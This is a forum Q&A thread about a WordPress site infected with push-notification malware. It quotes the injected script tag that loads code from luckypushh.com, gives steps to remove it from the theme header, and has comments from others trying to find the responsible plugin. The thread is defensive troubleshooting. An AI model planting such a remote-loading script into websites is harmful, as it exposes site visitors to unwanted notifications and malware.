0 votes
276 views
asked in Website by

I was contacted by a friend who said that a Pop-up box started appearing , just like the one which asks for browser notification permission on examining the box it turned out to be malware

1 Answer

0 votes
answered by
 
Best answer

I was contacted by a friend who said that a Pop-up box started appearing , just like the one which asks for browser notification permission on examining the box it turned out to be malware pushing subscribes for a website Luckypushh . com

At time of writing of writing I couldn't pin point the exact Plugin which injected it , but as the last two updated apps where All In One SEO and Sucuri Defender so strongest chances are of these two plugins.

The following code was injected on the blog

<script src="//luckypushh.com/ntfc.php?p=xxx" data-cfasync="false" async=""></script>

A google search didn't show much about luckypushh.com just that the domain was registered on 30 March 2018. There are 125 indexed searches on google with the same injected code put a different parameter number.

Once clicking the "Allow" in fake notification subscriber, It opens up a pop-up box , which prompts an actual browser notifications for the website "Luckypushh.com" 

How to Remove LuckyPussh Notification Subscribe Malware

Open your WordPress Dashboard and go to Appearance > Editor , select "header" file and remove the Script tags highlighted at Line 8

Any information on the actual culprit would be highly appreciated so that I may add to it and remove the bloody plugin for good

commented ago by
I've had the same problem. I didn't find the LuckyPussh code in the header so restored a backup of the site. I'm not using either of the plugins you mentioned, maybe we could compare plugins and see if we have any in common? My site is using the GeneratePress  theme with the free version of Elementor.
commented ago by
Were you by any chance using Easy Facebook Likebox? I suspect it might be the culprit.
commented ago by
Can you link to a recent plugin update and this issue appearing ?

We can ,you can email me your plugin list ..I'll email you the plugin list of the above mentioned blog .

No the blog doesn't have easy Facebook likebox ...

This makes it weird
Welcome to Ask Techie
Ask questions and receive answers from other members of the community. Hacking,Technology,Gaming,Programming,Blockchain / CryptoCurrency and everything to get you going with your Cyber World.

137 questions

145 answers

308 comments

343 users

...